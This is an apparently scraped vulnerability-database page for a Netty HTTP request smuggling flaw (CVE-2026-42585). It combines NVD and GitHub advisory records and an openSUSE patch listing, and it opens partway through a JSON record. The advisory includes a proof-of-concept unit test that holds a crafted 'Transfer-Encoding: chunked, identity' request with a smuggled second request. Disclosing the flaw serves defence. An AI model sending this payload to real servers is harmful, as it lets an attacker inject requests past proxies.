{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5598"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2025-59250, CVE-2026-1002, CVE-2026-33870, CVE-2026-33871, CVE-2026-39852, CVE-2026-41417, CVE-2026-42198, CVE-2026-42577, CVE-2026-42578, CVE-2026-42579, CVE-2026-42580, CVE-2026-42581, CVE-2026-42583, CVE-2026-42584, CVE-2026-42585, CVE-2026-42587, CVE-2026-5588, CVE-2026-5598, ghsa-38f8-5428-x5cv, ghsa-3p8m-j85q-pgmj, ghsa-45p5-v273-3qqr, ghsa-45q3-82m4-75jr, ghsa-4cx2-fc23-5wg6, ghsa-57rv-r2g8-2cj3, ghsa-9342-92gg-6v29, ghsa-98qh-xjc8-98pq, ghsa-c3fc-8qff-9hwx, ghsa-cm33-6792-r9fm, ghsa-cphf-4846-3xx9, ghsa-fghv-69vj-qj49, ghsa-h5fg-jpgr-rv9c, ghsa-hq9p-pm7w-8p54, ghsa-j288-q9x7-2f5v, ghsa-m4cv-j2px-7723, ghsa-mj4r-2hfc-f8p6, ghsa-p93r-85wp-75v3, ghsa-pwqr-wmgm-9rr8, ghsa-rc95-pcm8-65v9, ghsa-rwm7-x88c-3g2p, ghsa-v8h7-rr48-vmmv, ghsa-w9fj-cfpg-grvv, ghsa-wg6q-6289-32hp, ghsa-xxqh-mfjm-7mv9 applied in versions: 26.1.4-r1, 26.4.11-r0, 26.4.11-r2",
"upstream": [
"CVE-2025-59250",
"CVE-2026-1002",
"CVE-2026-33870",
"CVE-2026-33871",
"CVE-2026-39852",
"CVE-2026-41417",
"CVE-2026-42198",
"CVE-2026-42577",
"CVE-2026-42578",
"CVE-2026-42579",
"CVE-2026-42580",
"CVE-2026-42581",
"CVE-2026-42583",
"CVE-2026-42584",
"CVE-2026-42585",
"CVE-2026-42587",
"CVE-2026-5588",
"CVE-2026-5598",
"ghsa-38f8-5428-x5cv",
"ghsa-3p8m-j85q-pgmj",
"ghsa-45p5-v273-3qqr",
"ghsa-45q3-82m4-75jr",
"ghsa-4cx2-fc23-5wg6",
"ghsa-57rv-r2g8-2cj3",
"ghsa-9342-92gg-6v29",
"ghsa-98qh-xjc8-98pq",
"ghsa-c3fc-8qff-9hwx",
"ghsa-cm33-6792-r9fm",
"ghsa-cphf-4846-3xx9",
"ghsa-fghv-69vj-qj49",
"ghsa-h5fg-jpgr-rv9c",
"ghsa-hq9p-pm7w-8p54",
"ghsa-j288-q9x7-2f5v",
"ghsa-m4cv-j2px-7723",
"ghsa-mj4r-2hfc-f8p6",
"ghsa-p93r-85wp-75v3",
"ghsa-pwqr-wmgm-9rr8",
"ghsa-rc95-pcm8-65v9",
"ghsa-rwm7-x88c-3g2p",
"ghsa-v8h7-rr48-vmmv",
"ghsa-w9fj-cfpg-grvv",
"ghsa-wg6q-6289-32hp",
"ghsa-xxqh-mfjm-7mv9"
]
}
FKIE_CVE-2026-42585
Vulnerability from fkie_nvd - Published: 2026-05-13 19:17 - Updated: 2026-06-17 10:48
Severity
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Summary
Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv | Exploit, Vendor Advisory |
{
"affected": [
{
"affectedData": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE205A5-2C43-40C9-A2FF-CF6759B8D861",
"versionEndExcluding": "4.1.133",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D94A720F-9CED-4BE9-8C37-FD9E2FD28472",
"versionEndExcluding": "4.2.13",
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
}
],
"id": "CVE-2026-42585",
"lastModified": "2026-06-17T10:48:05.763",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-42585",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-15T20:33:59.288432Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-13T19:17:24.187",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-444"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-38F8-5428-X5CV
Vulnerability from github – Published: 2026-05-07 00:22 – Updated: 2026-05-14 20:41
VLAI
Summary
Netty vulnerable to HTTP Request Smuggling due to malformed Transfer-Encoding
Details
Summary
Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks.
Details
Netty incorrectly marks a request as chunked when malformed "Transfer-Encoding: chunked, identity" is present. According to RFC https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length
" If a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding, the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request) status code and then close the connection. "
A possible scenario is when Netty is behind a proxy that doesn't reject requests with "Transfer-Encoding: chunked, identity", but prefers "Content-Length" and forwards the content to Netty.
PoC
The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a request body.
@Test
public void test() {
String requestStr = "POST / HTTP/1.1\r\n" +
"Host: localhost\r\n" +
"Transfer-Encoding: chunked, identity\r\n" +
"Content-Length: 48\r\n" +
"\r\n" +
"0\r\n" +
"\r\n" +
"GET /smuggled HTTP/1.1\r\n" +
"Host: localhost\r\n" +
"\r\n";
EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));
// Request 1
HttpRequest request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
assertTrue(request.headers().contains("Transfer-Encoding"));
assertFalse(request.headers().contains("Content-Length"));
LastHttpContent last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
// Request 2
request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
}
Impact
HTTP Request Smuggling: Attacker injects arbitrary HTTP requests
Severity
6.5 (Medium)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.12.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.13.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.132.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.133.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42585"
],
"database_specific": {
"cwe_ids": [
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T00:22:27Z",
"nvd_published_at": "2026-05-13T19:17:24Z",
"severity": "MODERATE"
},
"details": "### Summary\nNetty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks.\n\n### Details\nNetty incorrectly marks a request as chunked when malformed \"Transfer-Encoding: chunked, identity\" is present.\nAccording to RFC https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length\n\n\"\nIf a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding,\n the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request)\n status code and then close the connection.\n\"\n\nA possible scenario is when Netty is behind a proxy that doesn\u0027t reject requests with \"Transfer-Encoding: chunked, identity\", but prefers \"Content-Length\" and forwards the content to Netty.\n\n### PoC\nThe test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a request body.\n\n```java\n@Test\n public void test() {\n String requestStr = \"POST / HTTP/1.1\\r\\n\" +\n \"Host: localhost\\r\\n\" +\n \"Transfer-Encoding: chunked, identity\\r\\n\" +\n \"Content-Length: 48\\r\\n\" +\n \"\\r\\n\" +\n \"0\\r\\n\" +\n \"\\r\\n\" +\n \"GET /smuggled HTTP/1.1\\r\\n\" +\n \"Host: localhost\\r\\n\" +\n \"\\r\\n\";\n\n EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());\n assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));\n\n // Request 1\n HttpRequest request = channel.readInbound();\n assertTrue(request.decoderResult().isSuccess());\n assertTrue(request.headers().contains(\"Transfer-Encoding\"));\n assertFalse(request.headers().contains(\"Content-Length\"));\n LastHttpContent last = channel.readInbound();\n assertTrue(last.decoderResult().isSuccess());\n last.release();\n\n // Request 2\n request = channel.readInbound();\n assertTrue(request.decoderResult().isSuccess());\n last = channel.readInbound();\n assertTrue(last.decoderResult().isSuccess());\n last.release();\n }\n```\n\n### Impact\nHTTP Request Smuggling: Attacker injects arbitrary HTTP requests",
"id": "GHSA-38f8-5428-x5cv",
"modified": "2026-05-14T20:41:21Z",
"published": "2026-05-07T00:22:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Netty vulnerable to HTTP Request Smuggling due to malformed Transfer-Encoding"
}
OPENSUSE-SU-2026:10795-1
Vulnerability from csaf_opensuse - Published: 2026-05-16 00:00 - Updated: 2026-05-16 00:00Summary
netty-4.1.133-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: netty-4.1.133-1.1 on GA media
Description of the patch: These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10795
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
6.5 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
8.2 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.6 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
